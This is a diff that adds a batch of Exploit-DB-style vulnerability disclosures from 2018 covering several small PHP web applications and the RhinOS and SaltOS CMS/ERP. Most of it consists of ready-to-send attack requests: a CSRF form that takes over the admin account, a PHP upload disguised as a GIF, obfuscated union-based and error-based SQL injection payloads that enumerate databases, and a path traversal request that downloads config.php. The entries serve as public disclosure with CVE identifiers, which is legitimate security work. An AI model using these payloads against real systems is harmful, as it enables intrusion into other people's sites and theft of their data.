 #87 message("[". $_POST['U_NAME'] ."] has been updated!", "success");
 #88 redirect("index.php");
 # ...
 <html>
 <body>
 <form action="http://localhost/[PATH]/user/controller.php?action=edit" method="POST">
 <input id="USERID" name="USERID" placeholder="Account Id" type="Hidden" value="1">
 <input name="U_NAME" placeholder="Account Name" type="text" value="admin">
 <input name="deptid" type="hidden" value="">
 <input name="U_USERNAME" placeholder="Username" type="text" value="admin">
 <input name="deptid" type="hidden" value="">
 <input name="U_PASS" placeholder="Account Password" type="Password" value="">
 <input name="deptid" type="hidden" value="">
 <input id="RU_PASS" name="RU_PASS" placeholder="Re-type Password" type="Password" value="">
 <select name="U_ROLE" id="U_ROLE">
 <option value="Administrator">Administrator</option>
 <option value="SSG">SSG</option>
 </select> 
 <button id="save" name="save" type="submit">Save</button> 
 </body>
 </html>
 POST /[PATH]/user/controller.php?action=edit HTTP/1.1
 Host: 192.168.1.27
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
 Connection: keep-alive
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 136
 USERID=1&U_NAME=admin_test&deptid=&U_USERNAME=admin_test&deptid=&U_PASS=admin_test&deptid=&RU_PASS=admin_test&U_ROLE=Administrator&save=
 HTTP/1.1 200 OK
 Date: Sun, 28 Oct 2018 17:57:48 GMT
 Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
 X-Powered-By: PHP/5.6.30
 Expires: Thu, 19 Nov 1981 08:52:00 GMT
 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
 Pragma: no-cache
 Content-Length: 128
 Keep-Alive: timeout=5, max=100
 Connection: Keep-Alive
 Content-Type: text/html; charset=UTF-8
 /* `exploitdb`.`useraccounts` */
 $useraccounts = array(
  array('ACCOUNT_ID' => '1','ACCOUNT_NAME' => 'admin_test','ACCOUNT_USERNAME' => 'admin_test','ACCOUNT_PASSWORD' => '3f72bcb53fb301af20d78d152456d901c30a43b3','ACCOUNT_TYPE' => 'Administrator','EMPID' => '1234','USERIMAGE' => 'photos/import2.png')
 );
--- a/exploits/php/webapps/45726.txt
+++ b/exploits/php/webapps/45726.txt
@ -0,0 +1,89 @@
 # Exploit Title: School Attendance Monitoring System 1.0 - Arbitrary File Upload
 # Dork: N/A
 # Date: 2018-10-29
 # Exploit Author: Ihsan Sencan
 # Vendor Homepage: https://www.sourcecodester.com/users/janobe
 # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/attendancemonitoring.zip
 # Version: 1.0
 # Category: Webapps
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: CVE-2018-18799
 # POC: 
 # 1)
 # http://localhost/[PATH]/event/controller.php?action=photos
 # 
 GIFefe
 <?php
 .....
 ?>
 # http://localhost/[PATH]/event/photo/[FILE]
 # 
 #[PATH]/event/controller.php
 #....
 #29	function doInsert(){
 #30	if(isset($_POST['save'])){
 #31  
 #32 
 #33	$errofile = $_FILES['image']['error'];
 #34	$type = $_FILES['image']['type'];
 #35	$temp = $_FILES['image']['tmp_name'];
 #36	$myfile =$_FILES['image']['name'];
 #37	$location="photo/".$myfile;
 #38	
 #39	@$file=$_FILES['image']['tmp_name'];
 #40	@$image= addslashes(file_get_contents($_FILES['image']['tmp_name']));
 #41	@$image_name= addslashes($_FILES['image']['name']); 
 #42	@$image_size= getimagesize($_FILES['image']['tmp_name']);
 #....
 GET /[PATH]/event/controller.php?action=photos HTTP/1.1
 Host: TARGET
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
 Connection: keep-alive
 Content-Type: multipart/form-data; boundary=
 ---------------------------3634372676911755021110261466
 Content-Length: 617
 -----------------------------3634372676911755021110261466
 Content-Disposition: form-data; name="EventID"
 1
 -----------------------------3634372676911755021110261466
 Content-Disposition: form-data; name="MAX_FILE_SIZE"
 1000000
 -----------------------------3634372676911755021110261466
 Content-Disposition: form-data; name="photo"; filename="phpinfo_gif.php"
 Content-Type: application/force-download
 GIFefe
 <?php
 phpinfo();
 ?>
 -----------------------------3634372676911755021110261466
 Content-Disposition: form-data; name="savephoto"
 -----------------------------3634372676911755021110261466--
 HTTP/1.1 200 OK
 Date: Sun, 28 Oct 2018 17:27:54 GMT
 Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
 X-Powered-By: PHP/5.6.30
 Expires: Thu, 19 Nov 1981 08:52:00 GMT
 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
 Pragma: no-cache
 Content-Length: 143
 Keep-Alive: timeout=5, max=100
 Connection: Keep-Alive
 Content-Type: text/html; charset=UTF-8
 # POC: 
 # 2)
 <html>
 <body>
 <form action="http://localhost/[PATH]/event/controller.php?action=photos" enctype="multipart/form-data" method="post">
 <input name="EventID" id="EventID" value="1" type="hidden">
 <input name="MAX_FILE_SIZE" value="1000000" type="hidden"> 
 <input id="photo" name="photo" type="file">
 <button name="savephoto" type="submit">Upload Photo</button>
 </form>
 </body>
 </html>
--- a/exploits/php/webapps/45727.txt
+++ b/exploits/php/webapps/45727.txt
@ -0,0 +1,108 @@
 # Exploit Title: School Attendance Monitoring System 1.0 - SQL Injection
 # Dork: N/A
 # Date: 2018-10-29
 # Exploit Author: Ihsan Sencan
 # Vendor Homepage: https://www.sourcecodester.com/users/janobe
 # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/attendancemonitoring.zip
 # Version: 1.0
 # Category: Webapps
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: CVE-2018-18798
 # POC: 
 # 1)
 # http://localhost/[PATH]/student/index.php?view=view&id=[SQL]
 # 
 #[PATH]/student/view.php
 #01 <?php  
 #02     $student = New Student();
 #03     $res = $student->select_student($_GET['id']);
 #04 
 #05      
 #06     $course = New Course();
 #07     $resCourse = $course->single_course($res->CourseID);
 #08 
 #09    ?>
 GET /[PATH]/student/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2d%2d%20%2d HTTP/1.1
 Host: TARGET
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
 Connection: keep-alive
 HTTP/1.1 200 OK
 Date: Sun, 28 Oct 2018 19:37:01 GMT
 Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
 X-Powered-By: PHP/5.6.30
 Expires: Thu, 19 Nov 1981 08:52:00 GMT
 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
 Pragma: no-cache
 Keep-Alive: timeout=5, max=100
 Connection: Keep-Alive
 Transfer-Encoding: chunked
 Content-Type: text/html; charset=UTF-8
 # POC: 
 # 2)
 # http://localhost/[PATH]/event/index.php?view=view&id=[SQL]
 # 
 #[PATH]/event/view.php
 #01 <?php  
 #02     $event = New Event();
 #03     $res = $event->single_event($_GET['id']);
 #04 
 #05  
 #06 
 #07    ?>
 GET /[PATH]/event/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2d%2d%20%2d HTTP/1.1
 Host: TARGET
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
 Connection: keep-alive
 HTTP/1.1 200 OK
 Date: Sun, 28 Oct 2018 17:12:15 GMT
 Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
 X-Powered-By: PHP/5.6.30
 Expires: Thu, 19 Nov 1981 08:52:00 GMT
 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
 Pragma: no-cache
 Keep-Alive: timeout=5, max=100
 Connection: Keep-Alive
 Transfer-Encoding: chunked
 Content-Type: text/html; charset=UTF-8
 # POC: 
 # 3)
 # http://localhost/[PATH]/user/index.php?view=view&id=[SQL]
 # 
 #[PATH]/user/view.php
 #01 <?php  
 #02     $user = New User();
 #03     $res = $user->single_user($_GET['id']);
 #04 
 #05    
 #06 
 #07    ?>
 GET /[PATH]/user/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2d%2d%20%2d HTTP/1.1
 Host: TARGET
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
 Connection: keep-alive
 HTTP/1.1 200 OK
 Date: Sun, 28 Oct 2018 17:16:52 GMT
 Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
 X-Powered-By: PHP/5.6.30
 Expires: Thu, 19 Nov 1981 08:52:00 GMT
 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
 Pragma: no-cache
 Keep-Alive: timeout=5, max=100
 Connection: Keep-Alive
 Transfer-Encoding: chunked
 Content-Type: text/html; charset=UTF-8
--- a/exploits/php/webapps/45728.txt
+++ b/exploits/php/webapps/45728.txt
@ -0,0 +1,104 @@
 # Exploit Title: PayPal/Credit Card/Debit Card Payment 1.0 - SQL Injection
 # Dork: N/A
 # Date: 2018-10-29
 # Exploit Author: Ihsan Sencan
 # Vendor Homepage: https://www.sourcecodester.com/users/janobe
 # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/tubigangarden.zip
 # Version: 1.0
 # Category: Webapps
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: CVE-2018-18800
 # POC: 
 # 1)
 # http://localhost/[PATH]/index.php?p=accomodation&q=[SQL]
 # 
 #[PATH]/accomodation.php
 #...
 #50  $query = "SELECT * FROM `tblroom` r ,`tblaccomodation` a WHERE r.`ACCOMID`=a.`ACCOMID` AND `ACCOMODATION`='" . $_GET['q'] . "' AND `NUMPERSON` = " . $_POST['person'];
 #51     
 #52 
 #53 }elseif(isset($_GET['q'])){
 #54 
 #55     $query = "SELECT * FROM `tblroom` r ,`tblaccomodation` a WHERE r.`ACCOMID`=a.`ACCOMID` AND `ACCOMODATION`='" . $_GET['q'] . "'"; 
 #56    
 #57  
 #58   
 #59   }
 #60 
 #61    $accomodation = ' | ' . $_GET['q'];
 #62   ?>
 #...
 GET /[PATH]/index.php?p=accomodation&q=-Standard%20Room%27%20%20UNION(SELECT(1),(2),(3),(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),(5),(6),(7),(8),(9),(10),(11),(12))--%20- HTTP/1.1
 Host: TARGET
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
 Connection: keep-alive
 HTTP/1.1 200 OK
 Date: Sun, 28 Oct 2018 19:55:17 GMT
 Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
 X-Powered-By: PHP/5.6.30
 Expires: Thu, 19 Nov 1981 08:52:00 GMT
 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
 Pragma: no-cache
 Keep-Alive: timeout=5, max=100
 Connection: Keep-Alive
 Transfer-Encoding: chunked
 Content-Type: text/html; charset=UTF-8
 # POC: 
 # 2)
 # http://localhost/[PATH]/index.php?p=rooms&q=[SQL]
 # 
 #[PATH]/room_rates.php
 #...
 #50  $query = "SELECT * FROM `tblroom` r ,`tblaccomodation` a WHERE r.`ACCOMID`=a.`ACCOMID`   AND `NUMPERSON` = " . $_POST['person'];
 #51     
 #52 
 #53 }elseif(isset($_GET['q'])){
 #54 
 #55     $query = "SELECT * FROM `tblroom` r ,`tblaccomodation` a WHERE r.`ACCOMID`=a.`ACCOMID` AND `ROOM` LIKE '%" . $_GET['q'] . "%'"; 
 #56    
 #57   
 #58   }else{
 #59      $query = "SELECT * FROM `tblroom` r ,`tblaccomodation` a WHERE r.`ACCOMID`=a.`ACCOMID`";
 #60   }
 #61 
 #62    $accomodation = ' | ' . @$_GET['q'];
 #63   ?>
 #...
 GET /[PATH]/index.php?p=rooms&q=RM%20223%27%20%20UNION(SELECT(1),(2),(3),(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),(5),(6),(7),(8),(9),(10),(11),(12))--%20- HTTP/1.1
 Host: TARGET
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
 Connection: keep-alive
 HTTP/1.1 200 OK
 Date: Sun, 28 Oct 2018 19:58:47 GMT
 Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
 X-Powered-By: PHP/5.6.30
 Expires: Thu, 19 Nov 1981 08:52:00 GMT
 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
 Pragma: no-cache
 Keep-Alive: timeout=5, max=100
 Connection: Keep-Alive
 Transfer-Encoding: chunked
 Content-Type: text/html; charset=UTF-8
 # POC: 
 # 3)
 # http://localhost/[PATH]/admin/login.php
 # 
 #[PATH]/admin/login.php
 #...
 #58 if (isset($_POST['btnlogin'])) {
 #59 //form has been submitted1
 #60     
 #61 $uname = trim($_POST['email']);
 #62 $upass = trim($_POST['pass']);
 #...
--- a/exploits/php/webapps/45729.txt
+++ b/exploits/php/webapps/45729.txt
@ -0,0 +1,62 @@
 # Exploit Title: RhinOS CMS 3.x - Arbitrary File Download
 # Dork: N/A
 # Date: 2018-10-29
 # Exploit Author: Ihsan Sencan
 # Vendor Homepage: http://www.saltos.org/
 # Software Link: https://netix.dl.sourceforge.net/project/rhinos/archived/r1190/RhinOS-en-3.0-1190.win32.exe
 # Version: 3.1 r0 / 3.x
 # Category: Webapps
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: CVE-2018-18760
 # Users...
 # C:/rhinos/demo/admin/php/download.php
 #....
 #26 $head=0;$main=0;$tail=0;
 #27 include("inicio.php");
 #28 if(!check_user()) die();
 #29 $name=getParam("name");
 #30 $file="files/".getParam("file");
 #31 $size=getParam("size");
 #32 $type=getParam("type");
 #33 if(!file_exists($file)) die();
 #34 header("Pragma: public");
 #35 header("Expires: 0");
 #36 header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
 #37 header("Content-Type: $type");
 #38 header("Content-Length: $size");
 #39 header("Content-Disposition: attachment; filename=\"$name\"");
 #40 header("Content-Transfer-Encoding: binary");
 #41 $fp=fopen($file,"rb");
 #42 while(!feof($fp)) echo fread($fp,8192);
 #43 fclose($fp);
 #44 disconnect();
 #....
 # POC: 
 # 1)
 # http://localhost/[PATH]/admin/inicio.php?include=php/download.php&name=efe.php&file=../config.php
 # 
 GET /[PATH]/admin/inicio.php?include=php/download.php&name=efe.php&file=../config.php HTTP/1.1
 Host: TARGET
 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:50.0) Gecko/20100101 Firefox/50.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Cookie: remember=0; PHPSESSID=ek24koab445aab70seegi02lh3
 DNT: 1
 Connection: keep-alive
 Upgrade-Insecure-Requests: 1
 HTTP/1.1 200 OK
 Date: Mon, 29 Oct 2018 00:23:54 GMT
 Server: Apache/2.2.16 (Win32) PHP/5.3.3
 X-Powered-By: PHP/5.3.3
 Expires: 0
 Cache-Control: must-revalidate, post-check=0, pre-check=0
 Pragma: public
 Content-Length: 1771
 Content-Disposition: attachment; filename="efe.php"
 Content-Transfer-Encoding: binary
 Keep-Alive: timeout=5, max=100
 Connection: Keep-Alive
 Content-Type:
--- a/exploits/php/webapps/45730.txt
+++ b/exploits/php/webapps/45730.txt
@ -0,0 +1,39 @@
 # Exploit Title: E-Negosyo System 1.0 - SQL Injection
 # Dork: N/A
 # Date: 2018-10-29
 # Exploit Author: Ihsan Sencan
 # Vendor Homepage: https://www.sourcecodester.com/users/janobe
 # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/bsenordering_9-23-18.zip
 # Version: 1.0
 # Category: Webapps
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: CVE-2018-18801
 # POC: 
 # 1)
 # http://localhost/[PATH]/student/index.php?view=view&id=[SQL]
 # 
 GET /[PATH]/index.php?q=product&category=Cakes%27%20%20UNION%20SELECT%201,2,3,4,5,6,7,(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),9,10,11,12,13,14,15,16,17,18,19,20--%20- HTTP/1.1
 Host: TARGET
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
 Connection: keep-alive
 HTTP/1.1 200 OK
 Date: Sun, 28 Oct 2018 20:24:30 GMT
 Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
 X-Powered-By: PHP/5.6.30
 Expires: Thu, 19 Nov 1981 08:52:00 GMT
 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
 Pragma: no-cache
 Keep-Alive: timeout=5, max=100
 Connection: Keep-Alive
 Transfer-Encoding: chunked
 Content-Type: text/html; charset=UTF-8
 # POC: 
 # 2)
 # http://localhost/[PATH]/index.php?q=single-item&id=[SQL]
 # ....
--- a/exploits/php/webapps/45731.txt
+++ b/exploits/php/webapps/45731.txt
@ -0,0 +1,50 @@
 # Exploit Title: SaltOS Erp, Crm 3.1 r8126 - SQL Injection
 # Dork: N/A
 # Date: 2018-10-29
 # Exploit Author: Ihsan Sencan
 # Vendor Homepage: http://www.saltos.org/
 # Software Link: http://download.saltos.org/?app=saltos&format=xul&arch=win32
 # Version: 3.1 r0 / 3.x
 # Category: Webapps
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: CVE-2018-18761
 # POC: 
 # 1)
 # http://localhost/[PATH]/index.php
 # 
 POST /index.php HTTP/1.1
 Host: http://localhost/[PATH]:57187
 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:50.0) Gecko/20100101 Firefox/50.0
 Accept: */*
 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 X-Requested-With: XMLHttpRequest
 Referer: http://localhost/[PATH]:57187/index.php
 Content-Length: 1318
 Cookie: PHPSESSID=3lqcs1bhqitg8ufb7v9kot7c71; lang=en_US; __lang__=1543313377; style=blue; __style__=1543313377; iconset=silk; __iconset__=1543313377
 DNT: 1
 Connection: keep-alive
 action=login&querystring=&user=%2531%2527%2561%256e%2564%2520%2528%2573%2565%256c%2565%2563%2574%2520%2531%2520%2566%2572%256f%256d%2520%2528%2573%2565%256c%2565%2563%2574%2520%2563%256f%2575%256e%2574%2528%252a%2529%252c%2563%256f%256e%2563%2561%2574%2528%2528%2573%2565%256c%2565%2563%2574%2528%2573%2565%256c%2565%2563%2574%2520%2563%256f%256e%2563%2561%2574%2528%2563%2561%2573%2574%2528%2564%2561%2574%2561%2562%2561%2573%2565%2528%2529%2520%2561%2573%2520%2563%2568%2561%2572%2529%252c%2530%2578%2537%2565%2529%2529%2520%2566%2572%256f%256d%2520%2569%256e%2566%256f%2572%256d%2561%2574%2569%256f%256e%255f%2573%2563%2568%2565%256d%2561%252e%2574%2561%2562%256c%2565%2573%2520%2577%2568%2565%2572%2565%2520%2574%2561%2562%256c%2565%255f%2573%2563%2568%2565%256d%2561%253d%2564%2561%2574%2561%2562%2561%2573%2565%2528%2529%2520%256c%2569%256d%2569%2574%2520%2530%252c%2531%2529%252c%2566%256c%256f%256f%2572%2528%2572%2561%256e%2564%2528%2530%2529%252a%2532%2529%2529%2578%2520%2566%2572%256f%256d%2520%2569%256e%2566%256f%2572%256d%2561%2574%2569%256f%256e%255f%2573%2563%2568%2565%256d%2561%252e%2574%2561%2562%256c%2565%2573%2520%2567%2572%256f%2575%2570%2520%2562%2579%2520%2578%2529%2561%2529%2520%2541%254e%2544%2520%2527%2545%2566%2565%2527%253d%2527%2545%2566%2565&pass=x&lang=en_US&style=blue&iconset=silk
 HTTP/1.1 200 OK
 Host: localhost/[PATH]:57187
 Connection: close
 X-Powered-By: PHP/5.4.15
 Expires: Thu, 19 Nov 1981 08:52:00 GMT
 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
 Pragma: no-cache
 Set-Cookie: PHPSESSID=3lqcs1bhqitg8ufb7v9kot7c71; path=\
 Set-Cookie: user=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=\
 Set-Cookie: __user__=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=\
 Set-Cookie: pass=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=\
 Set-Cookie: __pass__=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=\
 Set-Cookie: remember=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=\
 Set-Cookie: __remember__=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=\
 Set-Cookie: lang=en_US; expires=Tue, 27-Nov-2018 10:10:06 GMT; path=\
 Set-Cookie: __lang__=1543313406; expires=Tue, 27-Nov-2018 10:10:06 GMT; path=\
 Set-Cookie: style=blue; expires=Tue, 27-Nov-2018 10:10:06 GMT; path=\
 Set-Cookie: __style__=1543313406; expires=Tue, 27-Nov-2018 10:10:06 GMT; path=\
 Set-Cookie: iconset=silk; expires=Tue, 27-Nov-2018 10:10:06 GMT; path=\
 Set-Cookie: __iconset__=1543313406; expires=Tue, 27-Nov-2018 10:10:06 GMT; path=\
 Content-Type: text/html;charset=UTF-8
--- a/exploits/php/webapps/45733.txt
+++ b/exploits/php/webapps/45733.txt
@ -0,0 +1,39 @@
 # Exploit Title: SaltOS Erp, Crm 3.1 r8126 - SQL Injection
 # Dork: N/A
 # Date: 2018-10-29
 # Exploit Author: Ihsan Sencan
 # Vendor Homepage: http://www.saltos.org/
 # Software Link: https://excellmedia.dl.sourceforge.net/project/saltos/stable/SaltOS-3.1-8126.linux-i686.tgz
 # Version: 3.1 r0 / 3.x
 # Category: Webapps
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: CVE-2018-18763
 # POC: 
 # 1)
 # http://localhost/[PATH]/index.php
 # 
 POST /[PATH]/index.php HTTP/1.1
 Host: TARGET
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 747
 Cookie: PHPSESSID=il9r6344ch0ned04kg1hpc7l45; lang=en_US; __lang__=1543322831; style=blue; __style__=1543322831; iconset=silk; __iconset__=1543322831
 DNT: 1
 Connection: keep-alive
 Upgrade-Insecure-Requests: 1
 action=ajax&query=numbers&page=usuarios&action2=list%27%29%20%61%6e%44%20%28%53%45%4c%65%63%74%20%31%35%35%20%46%72%6f%4d%28%53%45%4c%45%43%54%20%43%4f%75%6e%74%28%2a%29%2c%43%4f%6e%63%61%54%28%63%6f%6e%43%41%54%28%30%78%32%30%33%61%32%30%2c%55%73%65%52%28%29%2c%44%61%74%41%42%41%53%45%28%29%2c%56%45%72%53%49%6f%4e%28%29%29%2c%30%78%37%65%2c%28%73%65%6c%65%43%54%20%28%65%6c%54%28%31%35%35%3d%31%35%35%2c%31%29%29%29%2c%30%78%34%39%36%38%37%33%36%31%36%65%32%30%35%33%36%35%36%65%36%33%36%31%36%65%2c%66%6c%6f%4f%52%28%52%41%6e%64%28%30%29%2a%32%29%29%78%20%66%72%4f%4d%20%49%4e%46%6f%72%6d%41%54%49%4f%4e%5f%53%63%68%45%4d%41%2e%50%4c%75%67%49%4e%53%20%47%72%6f%55%50%20%42%59%20%78%29%61%29%20%41%6e%64%20%28%27%45%66%65%27%3d%27%45%66%65&id=0: undefined
 HTTP/1.1 200 OK
 Date: Mon, 29 Oct 2018 00:12:53 GMT
 Server: Apache/2.4.4 (Win32) OpenSSL/0.9.8y PHP/5.4.16
 X-Powered-By: SaltOS v3.1 r8126
 Expires: -1
 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
 Pragma: no-cache
 Vary: Accept-Encoding
 Connection: keep-alive, close
